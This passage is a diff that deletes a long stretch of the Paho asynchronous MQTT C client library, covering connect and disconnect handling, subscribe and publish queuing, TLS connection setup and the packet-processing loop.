-	MQTTAsync_queuedCommand* conn;
-
-	FUNC_ENTRY;
-	if (options == NULL)
-	{
-		rc = MQTTASYNC_NULL_PARAMETER;
-		goto exit;
-	}
-
-	if (strncmp(options->struct_id, "MQTC", 4) != 0 || options->struct_version < 0 || options->struct_version > 5)
-	{
-		rc = MQTTASYNC_BAD_STRUCTURE;
-		goto exit;
-	}
-	if (options->will) /* check validity of will options structure */
-	{
-		if (strncmp(options->will->struct_id, "MQTW", 4) != 0 || (options->will->struct_version != 0 && options->will->struct_version != 1))
-		{
-			rc = MQTTASYNC_BAD_STRUCTURE;
-			goto exit;
-		}
-		if (options->will->qos < 0 || options->will->qos > 2)
-		{
-			rc = MQTTASYNC_BAD_QOS;
-			goto exit;
-		}
-	}
-	if (options->struct_version != 0 && options->ssl) /* check validity of SSL options structure */
-	{
-		if (strncmp(options->ssl->struct_id, "MQTS", 4) != 0 || options->ssl->struct_version < 0 || options->ssl->struct_version > 1)
-		{
-			rc = MQTTASYNC_BAD_STRUCTURE;
-			goto exit;
-		}
-	}
-	if ((options->username && !UTF8_validateString(options->username)) ||
-		(options->password && !UTF8_validateString(options->password)))
-	{
-		rc = MQTTASYNC_BAD_UTF8_STRING;
-		goto exit;
-	}
-
-	m->connect.onSuccess = options->onSuccess;
-	m->connect.onFailure = options->onFailure;
-	m->connect.context = options->context;
-	m->connectTimeout = options->connectTimeout;
-
-	tostop = 0;
-	if (sendThread_state != STARTING && sendThread_state != RUNNING)
-	{
-		MQTTAsync_lock_mutex(mqttasync_mutex);
-		sendThread_state = STARTING;
-		Thread_start(MQTTAsync_sendThread, NULL);
-		MQTTAsync_unlock_mutex(mqttasync_mutex);
-	}
-	if (receiveThread_state != STARTING && receiveThread_state != RUNNING)
-	{
-		MQTTAsync_lock_mutex(mqttasync_mutex);
-		receiveThread_state = STARTING;
-		Thread_start(MQTTAsync_receiveThread, handle);
-		MQTTAsync_unlock_mutex(mqttasync_mutex);
-	}
-
-	m->c->keepAliveInterval = options->keepAliveInterval;
-	setRetryLoopInterval(options->keepAliveInterval);
-	m->c->cleansession = options->cleansession;
-	m->c->maxInflightMessages = options->maxInflight;
-	if (options->struct_version >= 3)
-		m->c->MQTTVersion = options->MQTTVersion;
-	else
-		m->c->MQTTVersion = 0;
-	if (options->struct_version >= 4)
-	{
-		m->automaticReconnect = options->automaticReconnect;
-		m->minRetryInterval = options->minRetryInterval;
-		m->maxRetryInterval = options->maxRetryInterval;
-	}
-
-	if (m->c->will)
-	{
-		free(m->c->will->payload);
-		free(m->c->will->topic);
-		free(m->c->will);
-		m->c->will = NULL;
-	}
-
-	if (options->will && (options->will->struct_version == 0 || options->will->struct_version == 1))
-	{
-		const void* source = NULL;
-
-		m->c->will = malloc(sizeof(willMessages));
-		if (options->will->message || (options->will->struct_version == 1 && options->will->payload.data))
-		{
-			if (options->will->struct_version == 1 && options->will->payload.data)
-			{
-				m->c->will->payloadlen = options->will->payload.len;
-				source = options->will->payload.data;
-			}
-			else
-			{
-				m->c->will->payloadlen = strlen(options->will->message);
-				source = (void*)options->will->message;
-			}
-			m->c->will->payload = malloc(m->c->will->payloadlen);
-			memcpy(m->c->will->payload, source, m->c->will->payloadlen);
-		}
-		else
-		{
-			m->c->will->payload = NULL;
-			m->c->will->payloadlen = 0;
-		}
-		m->c->will->qos = options->will->qos;
-		m->c->will->retained = options->will->retained;
-		m->c->will->topic = MQTTStrdup(options->will->topicName);
-	}
-
-#if defined(OPENSSL)
-	if (m->c->sslopts)
-	{
-		if (m->c->sslopts->trustStore)
-			free((void*)m->c->sslopts->trustStore);
-		if (m->c->sslopts->keyStore)
-			free((void*)m->c->sslopts->keyStore);
-		if (m->c->sslopts->privateKey)
-			free((void*)m->c->sslopts->privateKey);
-		if (m->c->sslopts->privateKeyPassword)
-			free((void*)m->c->sslopts->privateKeyPassword);
-		if (m->c->sslopts->enabledCipherSuites)
-			free((void*)m->c->sslopts->enabledCipherSuites);
-		free((void*)m->c->sslopts);
-		m->c->sslopts = NULL;
-	}
-
-	if (options->struct_version != 0 && options->ssl)
-	{
-		m->c->sslopts = malloc(sizeof(MQTTClient_SSLOptions));
-		memset(m->c->sslopts, '\0', sizeof(MQTTClient_SSLOptions));
-		m->c->sslopts->struct_version = options->ssl->struct_version;
-		if (options->ssl->trustStore)
-			m->c->sslopts->trustStore = MQTTStrdup(options->ssl->trustStore);
-		if (options->ssl->keyStore)
-			m->c->sslopts->keyStore = MQTTStrdup(options->ssl->keyStore);
-		if (options->ssl->privateKey)
-			m->c->sslopts->privateKey = MQTTStrdup(options->ssl->privateKey);
-		if (options->ssl->privateKeyPassword)
-			m->c->sslopts->privateKeyPassword = MQTTStrdup(options->ssl->privateKeyPassword);
-		if (options->ssl->enabledCipherSuites)
-			m->c->sslopts->enabledCipherSuites = MQTTStrdup(options->ssl->enabledCipherSuites);
-		m->c->sslopts->enableServerCertAuth = options->ssl->enableServerCertAuth;
-		if (m->c->sslopts->struct_version >= 1)
-			m->c->sslopts->sslVersion = options->ssl->sslVersion;
-	}
-#else
-	if (options->struct_version != 0 && options->ssl)
-	{
-		rc = MQTTASYNC_SSL_NOT_SUPPORTED;
-		goto exit;
-	}
-#endif
-
-	m->c->username = options->username;
-	m->c->password = options->password;
-	if (options->password)
-		m->c->passwordlen = strlen(options->password);
-	else if (options->struct_version >= 5 && options->binarypwd.data)
-	{
-		m->c->password = options->binarypwd.data;
-		m->c->passwordlen = options->binarypwd.len;
-	}
-
-	m->c->retryInterval = options->retryInterval;
-	m->shouldBeConnected = 1;
-
-	m->connectTimeout = options->connectTimeout;
-
-	MQTTAsync_freeServerURIs(m);
-	if (options->struct_version >= 2 && options->serverURIcount > 0)
-	{
-		int i;
-
-		m->serverURIcount = options->serverURIcount;
-		m->serverURIs = malloc(options->serverURIcount * sizeof(char*));
-		for (i = 0; i < options->serverURIcount; ++i)
-			m->serverURIs[i] = MQTTStrdup(options->serverURIs[i]);
-	}
-
-	/* Add connect request to operation queue */
-	conn = malloc(sizeof(MQTTAsync_queuedCommand));
-	memset(conn, '\0', sizeof(MQTTAsync_queuedCommand));
-	conn->client = m;
-	if (options)
-	{
-		conn->command.onSuccess = options->onSuccess;
-		conn->command.onFailure = options->onFailure;
-		conn->command.context = options->context;
-	}
-	conn->command.type = CONNECT;
-	conn->command.details.conn.currentURI = 0;
-	rc = MQTTAsync_addCommand(conn, sizeof(conn));
-
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-static int MQTTAsync_disconnect1(MQTTAsync handle, const MQTTAsync_disconnectOptions* options, int internal)
-{
-	MQTTAsyncs* m = handle;
-	int rc = MQTTASYNC_SUCCESS;
-	MQTTAsync_queuedCommand* dis;
-
-	FUNC_ENTRY;
-	if (m == NULL || m->c == NULL)
-	{
-		rc = MQTTASYNC_FAILURE;
-		goto exit;
-	}
-	if (!internal)
-		m->shouldBeConnected = 0;
-	if (m->c->connected == 0)
-	{
-		rc = MQTTASYNC_DISCONNECTED;
-		goto exit;
-	}
-
-	/* Add disconnect request to operation queue */
-	dis = malloc(sizeof(MQTTAsync_queuedCommand));
-	memset(dis, '\0', sizeof(MQTTAsync_queuedCommand));
-	dis->client = m;
-	if (options)
-	{
-		dis->command.onSuccess = options->onSuccess;
-		dis->command.onFailure = options->onFailure;
-		dis->command.context = options->context;
-		dis->command.details.dis.timeout = options->timeout;
-	}
-	dis->command.type = DISCONNECT;
-	dis->command.details.dis.internal = internal;
-	rc = MQTTAsync_addCommand(dis, sizeof(dis));
-
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-static int MQTTAsync_disconnect_internal(MQTTAsync handle, int timeout)
-{
-	MQTTAsync_disconnectOptions options = MQTTAsync_disconnectOptions_initializer;
-
-	options.timeout = timeout;
-	return MQTTAsync_disconnect1(handle, &options, 1);
-}
-
-
-void MQTTProtocol_closeSession(Clients* c, int sendwill)
-{
-	MQTTAsync_disconnect_internal((MQTTAsync)c->context, 0);
-}
-
-
-int MQTTAsync_disconnect(MQTTAsync handle, const MQTTAsync_disconnectOptions* options)
-{
-	return MQTTAsync_disconnect1(handle, options, 0);
-}
-
-
-int MQTTAsync_isConnected(MQTTAsync handle)
-{
-	MQTTAsyncs* m = handle;
-	int rc = 0;
-
-	FUNC_ENTRY;
-	MQTTAsync_lock_mutex(mqttasync_mutex);
-	if (m && m->c)
-		rc = m->c->connected;
-	MQTTAsync_unlock_mutex(mqttasync_mutex);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-static int cmdMessageIDCompare(void* a, void* b)
-{
-	MQTTAsync_queuedCommand* cmd = (MQTTAsync_queuedCommand*)a;
-	return cmd->command.token == *(int*)b;
-}
-
-
-/**
- * Assign a new message id for a client.  Make sure it isn't already being used and does
- * not exceed the maximum.
- * @param m a client structure
- * @return the next message id to use, or 0 if none available
- */
-static int MQTTAsync_assignMsgId(MQTTAsyncs* m)
-{
-	int start_msgid = m->c->msgID;
-	int msgid = start_msgid;
-	thread_id_type thread_id = 0;
-	int locked = 0;
-
-	/* need to check: commands list and response list for a client */
-	FUNC_ENTRY;
-	/* We might be called in a callback. In which case, this mutex will be already locked. */
-	thread_id = Thread_getid();
-	if (thread_id != sendThread_id && thread_id != receiveThread_id)
-	{
-		MQTTAsync_lock_mutex(mqttasync_mutex);
-		locked = 1;
-	}
-
-	msgid = (msgid == MAX_MSG_ID) ? 1 : msgid + 1;
-	while (ListFindItem(commands, &msgid, cmdMessageIDCompare) ||
-			ListFindItem(m->responses, &msgid, cmdMessageIDCompare))
-	{
-		msgid = (msgid == MAX_MSG_ID) ? 1 : msgid + 1;
-		if (msgid == start_msgid)
-		{ /* we've tried them all - none free */
-			msgid = 0;
-			break;
-		}
-	}
-	if (msgid != 0)
-		m->c->msgID = msgid;
-	if (locked)
-		MQTTAsync_unlock_mutex(mqttasync_mutex);
-	FUNC_EXIT_RC(msgid);
-	return msgid;
-}
-
-
-int MQTTAsync_subscribeMany(MQTTAsync handle, int count, char* const* topic, int* qos, MQTTAsync_responseOptions* response)
-{
-	MQTTAsyncs* m = handle;
-	int i = 0;
-	int rc = MQTTASYNC_FAILURE;
-	MQTTAsync_queuedCommand* sub;
-	int msgid = 0;
-
-	FUNC_ENTRY;
-	if (m == NULL || m->c == NULL)
-	{
-		rc = MQTTASYNC_FAILURE;
-		goto exit;
-	}
-	if (m->c->connected == 0)
-	{
-		rc = MQTTASYNC_DISCONNECTED;
-		goto exit;
-	}
-	for (i = 0; i < count; i++)
-	{
-		if (!UTF8_validateString(topic[i]))
-		{
-			rc = MQTTASYNC_BAD_UTF8_STRING;
-			goto exit;
-		}
-		if (qos[i] < 0 || qos[i] > 2)
-		{
-			rc = MQTTASYNC_BAD_QOS;
-			goto exit;
-		}
-	}
-	if ((msgid = MQTTAsync_assignMsgId(m)) == 0)
-	{
-		rc = MQTTASYNC_NO_MORE_MSGIDS;
-		goto exit;
-	}
-
-	/* Add subscribe request to operation queue */
-	sub = malloc(sizeof(MQTTAsync_queuedCommand));
-	memset(sub, '\0', sizeof(MQTTAsync_queuedCommand));
-	sub->client = m;
-	sub->command.token = msgid;
-	if (response)
-	{
-		sub->command.onSuccess = response->onSuccess;
-		sub->command.onFailure = response->onFailure;
-		sub->command.context = response->context;
-		response->token = sub->command.token;
-	}
-	sub->command.type = SUBSCRIBE;
-	sub->command.details.sub.count = count;
-	sub->command.details.sub.topics = malloc(sizeof(char*) * count);
-	sub->command.details.sub.qoss = malloc(sizeof(int) * count);
-	for (i = 0; i < count; ++i)
-	{
-		sub->command.details.sub.topics[i] = MQTTStrdup(topic[i]);
-		sub->command.details.sub.qoss[i] = qos[i];
-	}
-	rc = MQTTAsync_addCommand(sub, sizeof(sub));
-
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-int MQTTAsync_subscribe(MQTTAsync handle, const char* topic, int qos, MQTTAsync_responseOptions* response)
-{
-	int rc = 0;
-	char *const topics[] = {(char*)topic};
-	FUNC_ENTRY;
-	rc = MQTTAsync_subscribeMany(handle, 1, topics, &qos, response);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-int MQTTAsync_unsubscribeMany(MQTTAsync handle, int count, char* const* topic, MQTTAsync_responseOptions* response)
-{
-	MQTTAsyncs* m = handle;
-	int i = 0;
-	int rc = SOCKET_ERROR;
-	MQTTAsync_queuedCommand* unsub;
-	int msgid = 0;
-
-	FUNC_ENTRY;
-	if (m == NULL || m->c == NULL)
-	{
-		rc = MQTTASYNC_FAILURE;
-		goto exit;
-	}
-	if (m->c->connected == 0)
-	{
-		rc = MQTTASYNC_DISCONNECTED;
-		goto exit;
-	}
-	for (i = 0; i < count; i++)
-	{
-		if (!UTF8_validateString(topic[i]))
-		{
-			rc = MQTTASYNC_BAD_UTF8_STRING;
-			goto exit;
-		}
-	}
-	if ((msgid = MQTTAsync_assignMsgId(m)) == 0)
-	{
-		rc = MQTTASYNC_NO_MORE_MSGIDS;
-		goto exit;
-	}
-
-	/* Add unsubscribe request to operation queue */
-	unsub = malloc(sizeof(MQTTAsync_queuedCommand));
-	memset(unsub, '\0', sizeof(MQTTAsync_queuedCommand));
-	unsub->client = m;
-	unsub->command.type = UNSUBSCRIBE;
-	unsub->command.token = msgid;
-	if (response)
-	{
-		unsub->command.onSuccess = response->onSuccess;
-		unsub->command.onFailure = response->onFailure;
-		unsub->command.context = response->context;
-		response->token = unsub->command.token;
-	}
-	unsub->command.details.unsub.count = count;
-	unsub->command.details.unsub.topics = malloc(sizeof(char*) * count);
-	for (i = 0; i < count; ++i)
-		unsub->command.details.unsub.topics[i] = MQTTStrdup(topic[i]);
-	rc = MQTTAsync_addCommand(unsub, sizeof(unsub));
-
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-int MQTTAsync_unsubscribe(MQTTAsync handle, const char* topic, MQTTAsync_responseOptions* response)
-{
-	int rc = 0;
-	char *const topics[] = {(char*)topic};
-	FUNC_ENTRY;
-	rc = MQTTAsync_unsubscribeMany(handle, 1, topics, response);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-static int MQTTAsync_countBufferedMessages(MQTTAsyncs* m)
-{
-	ListElement* current = NULL;
-	int count = 0;
-
-	while (ListNextElement(commands, &current))
-	{
-		MQTTAsync_queuedCommand* cmd = (MQTTAsync_queuedCommand*)(current->content);
-
-		if (cmd->client == m && cmd->command.type == PUBLISH)
-			count++;
-	}
-	return count;
-}
-
-
-int MQTTAsync_send(MQTTAsync handle, const char* destinationName, int payloadlen, void* payload,
-							 int qos, int retained, MQTTAsync_responseOptions* response)
-{
-	int rc = MQTTASYNC_SUCCESS;
-	MQTTAsyncs* m = handle;
-	MQTTAsync_queuedCommand* pub;
-	int msgid = 0;
-
-	FUNC_ENTRY;
-	if (m == NULL || m->c == NULL)
-		rc = MQTTASYNC_FAILURE;
-	else if (m->c->connected == 0 && (m->createOptions == NULL ||
-		m->createOptions->sendWhileDisconnected == 0 || m->shouldBeConnected == 0))
-		rc = MQTTASYNC_DISCONNECTED;
-	else if (!UTF8_validateString(destinationName))
-		rc = MQTTASYNC_BAD_UTF8_STRING;
-	else if (qos < 0 || qos > 2)
-		rc = MQTTASYNC_BAD_QOS;
-	else if (qos > 0 && (msgid = MQTTAsync_assignMsgId(m)) == 0)
-		rc = MQTTASYNC_NO_MORE_MSGIDS;
-	else if (m->createOptions && (MQTTAsync_countBufferedMessages(m) >= m->createOptions->maxBufferedMessages))
-		rc = MQTTASYNC_MAX_BUFFERED_MESSAGES;
-
-	if (rc != MQTTASYNC_SUCCESS)
-		goto exit;
-
-	/* Add publish request to operation queue */
-	pub = malloc(sizeof(MQTTAsync_queuedCommand));
-	memset(pub, '\0', sizeof(MQTTAsync_queuedCommand));
-	pub->client = m;
-	pub->command.type = PUBLISH;
-	pub->command.token = msgid;
-	if (response)
-	{
-		pub->command.onSuccess = response->onSuccess;
-		pub->command.onFailure = response->onFailure;
-		pub->command.context = response->context;
-		response->token = pub->command.token;
-	}
-	pub->command.details.pub.destinationName = MQTTStrdup(destinationName);
-	pub->command.details.pub.payloadlen = payloadlen;
-	pub->command.details.pub.payload = malloc(payloadlen);
-	memcpy(pub->command.details.pub.payload, payload, payloadlen);
-	pub->command.details.pub.qos = qos;
-	pub->command.details.pub.retained = retained;
-	rc = MQTTAsync_addCommand(pub, sizeof(pub));
-
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-
-int MQTTAsync_sendMessage(MQTTAsync handle, const char* destinationName, const MQTTAsync_message* message,
-													 MQTTAsync_responseOptions* response)
-{
-	int rc = MQTTASYNC_SUCCESS;
-
-	FUNC_ENTRY;
-	if (message == NULL)
-	{
-		rc = MQTTASYNC_NULL_PARAMETER;
-		goto exit;
-	}
-	if (strncmp(message->struct_id, "MQTM", 4) != 0 || message->struct_version != 0)
-	{
-		rc = MQTTASYNC_BAD_STRUCTURE;
-		goto exit;
-	}
-
-	rc = MQTTAsync_send(handle, destinationName, message->payloadlen, message->payload,
-								message->qos, message->retained, response);
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-static void MQTTAsync_retry(void)
-{
-	static time_t last = 0L;
-	time_t now;
-
-	FUNC_ENTRY;
-	time(&(now));
-	if (difftime(now, last) > retryLoopInterval)
-	{
-		time(&(last));
-		MQTTProtocol_keepalive(now);
-		MQTTProtocol_retry(now, 1, 0);
-	}
-	else
-		MQTTProtocol_retry(now, 0, 0);
-	FUNC_EXIT;
-}
-
-
-static int MQTTAsync_connecting(MQTTAsyncs* m)
-{
-	int rc = -1;
-
-	FUNC_ENTRY;
-	if (m->c->connect_state == 1) /* TCP connect started - check for completion */
-	{
-		int error;
-		socklen_t len = sizeof(error);
-
-		if ((rc = getsockopt(m->c->net.socket, SOL_SOCKET, SO_ERROR, (char*)&error, &len)) == 0)
-			rc = error;
-
-		if (rc != 0)
-			goto exit;
-
-		Socket_clearPendingWrite(m->c->net.socket);
-
-#if defined(OPENSSL)
-		if (m->ssl)
-		{
-			int port;
-			char* hostname;
-			int setSocketForSSLrc = 0;
-
-			hostname = MQTTProtocol_addressPort(m->serverURI, &port);
-			setSocketForSSLrc = SSLSocket_setSocketForSSL(&m->c->net, m->c->sslopts, hostname);
-			if (hostname != m->serverURI)
-				free(hostname);
-
-			if (setSocketForSSLrc != MQTTASYNC_SUCCESS)
-			{
-				if (m->c->session != NULL)
-					if ((rc = SSL_set_session(m->c->net.ssl, m->c->session)) != 1)
-						Log(TRACE_MIN, -1, "Failed to set SSL session with stored data, non critical");
-				rc = SSLSocket_connect(m->c->net.ssl, m->c->net.socket);
-				if (rc == TCPSOCKET_INTERRUPTED)
-				{
-					rc = MQTTCLIENT_SUCCESS; /* the connect is still in progress */
-					m->c->connect_state = 2;
-				}
-				else if (rc == SSL_FATAL)
-				{
-					rc = SOCKET_ERROR;
-					goto exit;
-				}
-				else if (rc == 1)
-				{
-					rc = MQTTCLIENT_SUCCESS;
-					m->c->connect_state = 3;
-					if (MQTTPacket_send_connect(m->c, m->connect.details.conn.MQTTVersion) == SOCKET_ERROR)
-					{
-						rc = SOCKET_ERROR;
-						goto exit;
-					}
-					if (!m->c->cleansession && m->c->session == NULL)
-						m->c->session = SSL_get1_session(m->c->net.ssl);
-				}
-			}
-			else
-			{
-				rc = SOCKET_ERROR;
-				goto exit;
-			}
-		}
-		else
-		{
-#endif
-			m->c->connect_state = 3; /* TCP/SSL connect completed, in which case send the MQTT connect packet */
-			if ((rc = MQTTPacket_send_connect(m->c, m->connect.details.conn.MQTTVersion)) == SOCKET_ERROR)
-				goto exit;
-#if defined(OPENSSL)
-		}
-#endif
-	}
-#if defined(OPENSSL)
-	else if (m->c->connect_state == 2) /* SSL connect sent - wait for completion */
-	{
-		if ((rc = SSLSocket_connect(m->c->net.ssl, m->c->net.socket)) != 1)
-			goto exit;
-
-		if(!m->c->cleansession && m->c->session == NULL)
-			m->c->session = SSL_get1_session(m->c->net.ssl);
-		m->c->connect_state = 3; /* SSL connect completed, in which case send the MQTT connect packet */
-		if ((rc = MQTTPacket_send_connect(m->c, m->connect.details.conn.MQTTVersion)) == SOCKET_ERROR)
-			goto exit;
-	}
-#endif
-
-exit:
-	if ((rc != 0 && rc != TCPSOCKET_INTERRUPTED && m->c->connect_state != 2) || (rc == SSL_FATAL))
-		nextOrClose(m, MQTTASYNC_FAILURE, "TCP/TLS connect failure");
-
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-static MQTTPacket* MQTTAsync_cycle(int* sock, unsigned long timeout, int* rc)
-{
-	struct timeval tp = {0L, 0L};
-	static Ack ack;
-	MQTTPacket* pack = NULL;
-
-	FUNC_ENTRY;
-	if (timeout > 0L)
-	{
-		tp.tv_sec = timeout / 1000;
-		tp.tv_usec = (timeout % 1000) * 1000; /* this field is microseconds! */
-	}
-
-#if defined(OPENSSL)
-	if ((*sock = SSLSocket_getPendingRead()) == -1)
-	{
-#endif
-		Thread_lock_mutex(socket_mutex);
-		/* 0 from getReadySocket indicates no work to do, -1 == error, but can happen normally */
-		*sock = Socket_getReadySocket(0, &tp);
-		Thread_unlock_mutex(socket_mutex);
-		if (!tostop && *sock == 0 && (tp.tv_sec > 0L || tp.tv_usec > 0L))
-			MQTTAsync_sleep(100L);
-#if defined(OPENSSL)
-	}
-#endif
-	MQTTAsync_lock_mutex(mqttasync_mutex);
-	if (*sock > 0)
-	{
-		MQTTAsyncs* m = NULL;
-		if (ListFindItem(handles, sock, clientSockCompare) != NULL)
-			m = (MQTTAsync)(handles->current->content);
-		if (m != NULL)
-		{
-			Log(TRACE_MINIMUM, -1, "m->c->connect_state = %d",m->c->connect_state);
-			if (m->c->connect_state == 1 || m->c->connect_state == 2)
-				*rc = MQTTAsync_connecting(m);
-			else
-				pack = MQTTPacket_Factory(&m->c->net, rc);
-			if (m->c->connect_state == 3 && *rc == SOCKET_ERROR)
-			{
-				Log(TRACE_MINIMUM, -1, "CONNECT sent but MQTTPacket_Factory has returned SOCKET_ERROR");
-				nextOrClose(m, MQTTASYNC_FAILURE, "TCP connect completion failure");
-			}
-			else
-			{
-				Log(TRACE_MINIMUM, -1, "m->c->connect_state = %d",m->c->connect_state);
-				Log(TRACE_MINIMUM, -1, "CONNECT sent, *rc is %d",*rc);
-			}
-		}
-		if (pack)
-		{
-			int freed = 1;
-
-			/* Note that these handle... functions free the packet structure that they are dealing with */
-			if (pack->header.bits.type == PUBLISH)
-				*rc = MQTTProtocol_handlePublishes(pack, *sock);
-			else if (pack->header.bits.type == PUBACK || pack->header.bits.type == PUBCOMP)
-			{
-				int msgid;
-
-				ack = (pack->header.bits.type == PUBCOMP) ? *(Pubcomp*)pack : *(Puback*)pack;
-				msgid = ack.msgId;
-				*rc = (pack->header.bits.type == PUBCOMP) ?
-						MQTTProtocol_handlePubcomps(pack, *sock) : MQTTProtocol_handlePubacks(pack, *sock);
-				if (!m)
-					Log(LOG_ERROR, -1, "PUBCOMP or PUBACK received for no client, msgid %d", msgid);
-				if (m)
-				{
-					ListElement* current = NULL;
-
-					if (m->dc)
-					{
-						Log(TRACE_MIN, -1, "Calling deliveryComplete for client %s, msgid %d", m->c->clientID, msgid);
-						(*(m->dc))(m->context, msgid);
-					}
-					/* use the msgid to find the callback to be called */
-					while (ListNextElement(m->responses, &current))
-					{
-						MQTTAsync_queuedCommand* command = (MQTTAsync_queuedCommand*)(current->content);
-						if (command->command.token == msgid)
-						{
-							if (!ListDetach(m->responses, command)) /* then remove the response from the list */
-								Log(LOG_ERROR, -1, "Publish command not removed from command list");
-							if (command->command.onSuccess)
-							{
-								MQTTAsync_successData data;
-
-								data.token = command->command.token;
-								data.alt.pub.destinationName = command->command.details.pub.destinationName;
-								data.alt.pub.message.payload = command->command.details.pub.payload;
-								data.alt.pub.message.payloadlen = command->command.details.pub.payloadlen;
-								data.alt.pub.message.qos = command->command.details.pub.qos;
-								data.alt.pub.message.retained = command->command.details.pub.retained;
-								Log(TRACE_MIN, -1, "Calling publish success for client %s", m->c->clientID);
-								(*(command->command.onSuccess))(command->command.context, &data);
-							}
-							MQTTAsync_freeCommand(command);
-							break;
-						}
-					}
-				}
-			}
-			else if (pack->header.bits.type == PUBREC)
-				*rc = MQTTProtocol_handlePubrecs(pack, *sock);
-			else if (pack->header.bits.type == PUBREL)
-				*rc = MQTTProtocol_handlePubrels(pack, *sock);
-			else if (pack->header.bits.type == PINGRESP)
-				*rc = MQTTProtocol_handlePingresps(pack, *sock);
-			else
-				freed = 0;
-			if (freed)
-				pack = NULL;
-		}
-	}
-	MQTTAsync_retry();
-	MQTTAsync_unlock_mutex(mqttasync_mutex);
-	FUNC_EXIT_RC(*rc);
-	return pack;
-}
-
-/*
-static int pubCompare(void* a, void* b)
-{
-	Messages* msg = (Messages*)a;
-	return msg->publish == (Publications*)b;
-}*/
-
-
-int MQTTAsync_getPendingTokens(MQTTAsync handle, MQTTAsync_token **tokens)
-{
-	int rc = MQTTASYNC_SUCCESS;
-	MQTTAsyncs* m = handle;
-	ListElement* current = NULL;
-	int count = 0;
-
-	FUNC_ENTRY;
-	MQTTAsync_lock_mutex(mqttasync_mutex);
-	*tokens = NULL;
-
-	if (m == NULL)
-	{
-		rc = MQTTASYNC_FAILURE;
-		goto exit;
-	}
-
-	/* calculate the number of pending tokens - commands plus inflight */
-	while (ListNextElement(commands, &current))
-	{
-		MQTTAsync_queuedCommand* cmd = (MQTTAsync_queuedCommand*)(current->content);
-
-		if (cmd->client == m)
-			count++;
-	}
-	if (m->c)
-		count += m->c->outboundMsgs->count;
-	if (count == 0)
-		goto exit; /* no tokens to return */
-	*tokens = malloc(sizeof(MQTTAsync_token) * (count + 1));  /* add space for sentinel at end of list */
-
-	/* First add the unprocessed commands to the pending tokens */
-	current = NULL;
-	count = 0;
-	while (ListNextElement(commands, &current))
-	{
-		MQTTAsync_queuedCommand* cmd = (MQTTAsync_queuedCommand*)(current->content);
-
-		if (cmd->client == m)
-			(*tokens)[count++] = cmd->command.token;
-	}
-
-	/* Now add the inflight messages */
-	if (m->c && m->c->outboundMsgs->count > 0)
-	{
-		current = NULL;
-		while (ListNextElement(m->c->outboundMsgs, &current))
-		{
-			Messages* m = (Messages*)(current->content);
-			(*tokens)[count++] = m->msgid;
-		}
-	}
-	(*tokens)[count] = -1; /* indicate end of list */
-
-exit:
-	MQTTAsync_unlock_mutex(mqttasync_mutex);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-int MQTTAsync_isComplete(MQTTAsync handle, MQTTAsync_token dt)
-{
-	int rc = MQTTASYNC_SUCCESS;
-	MQTTAsyncs* m = handle;
-	ListElement* current = NULL;
-
-	FUNC_ENTRY;
-	MQTTAsync_lock_mutex(mqttasync_mutex);
-
-	if (m == NULL)
-	{
-		rc = MQTTASYNC_FAILURE;
-		goto exit;
-	}
-
-	/* First check unprocessed commands */
-	current = NULL;
-	while (ListNextElement(commands, &current))
-	{
-		MQTTAsync_queuedCommand* cmd = (MQTTAsync_queuedCommand*)(current->content);
-
-		if (cmd->client == m && cmd->command.token == dt)
-			goto exit;
-	}
-
-	/* Now check the inflight messages */
-	if (m->c && m->c->outboundMsgs->count > 0)
-	{
-		current = NULL;
-		while (ListNextElement(m->c->outboundMsgs, &current))
-		{
-			Messages* m = (Messages*)(current->content);
-			if (m->msgid == dt)
-				goto exit;
-		}
-	}
-	rc = MQTTASYNC_TRUE; /* Can't find it, so it must be complete */
-
-exit:
-	MQTTAsync_unlock_mutex(mqttasync_mutex);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-int MQTTAsync_waitForCompletion(MQTTAsync handle, MQTTAsync_token dt, unsigned long timeout)
-{
-	int rc = MQTTASYNC_FAILURE;
-	START_TIME_TYPE start = MQTTAsync_start_clock();
-	unsigned long elapsed = 0L;
-	MQTTAsyncs* m = handle;
-
-	FUNC_ENTRY;
-	MQTTAsync_lock_mutex(mqttasync_mutex);
-
-	if (m == NULL || m->c == NULL)
-	{
-		MQTTAsync_unlock_mutex(mqttasync_mutex);
-		rc = MQTTASYNC_FAILURE;
-		goto exit;
-	}
-	if (m->c->connected == 0)
-	{
-		MQTTAsync_unlock_mutex(mqttasync_mutex);
-		rc = MQTTASYNC_DISCONNECTED;
-		goto exit;
-	}
-	MQTTAsync_unlock_mutex(mqttasync_mutex);
-
-	if (MQTTAsync_isComplete(handle, dt) == 1)
-	{
-		rc = MQTTASYNC_SUCCESS; /* well we couldn't find it */
-		goto exit;
-	}
-
-	elapsed = MQTTAsync_elapsed(start);
-	while (elapsed < timeout)
-	{
-		MQTTAsync_sleep(100);
-		if (MQTTAsync_isComplete(handle, dt) == 1)
-		{
-			rc = MQTTASYNC_SUCCESS; /* well we couldn't find it */
-			goto exit;
-		}
-		elapsed = MQTTAsync_elapsed(start);
-	}
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-
-void MQTTAsync_setTraceLevel(enum MQTTASYNC_TRACE_LEVELS level)
-{
-	Log_setTraceLevel((enum LOG_LEVELS)level);
-}
-
-
-void MQTTAsync_setTraceCallback(MQTTAsync_traceCallback* callback)
-{
-	Log_setTraceCallback((Log_traceCallback*)callback);
-}
-
-
-MQTTAsync_nameValue* MQTTAsync_getVersionInfo(void)
-{
-	#define MAX_INFO_STRINGS 8
-	static MQTTAsync_nameValue libinfo[MAX_INFO_STRINGS + 1];
-	int i = 0;
-
-	libinfo[i].name = "Product name";
-	libinfo[i++].value = "Paho Asynchronous MQTT C Client Library";
-
-	libinfo[i].name = "Version";
-	libinfo[i++].value = CLIENT_VERSION;
-
-	libinfo[i].name = "Build level";
-	libinfo[i++].value = BUILD_TIMESTAMP;
